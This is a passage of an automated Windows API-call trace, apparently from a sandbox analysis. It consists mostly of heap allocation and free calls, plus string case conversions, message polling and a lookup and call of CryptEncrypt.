hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a7eb0 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0196.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0196.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0196.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9d98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0196.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.231] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0196.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0196.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0196.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0196.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0196.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0196.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0196.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0196.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0196.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.231] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x1f6a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x1f70) returned 1 [0196.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0196.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0196.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0196.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0196.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0196.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0196.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0196.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0196.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0196.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0196.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0196.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0196.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0196.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.235] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.236] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.236] CharLowerBuffW (in: lpsz="byte[8048]", cchLength=0xa | out: lpsz="byte[8048]") returned 0xa [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0196.237] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0196.239] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0196.239] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.239] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.239] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0196.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.240] CharLowerBuffW (in: lpsz="bool", 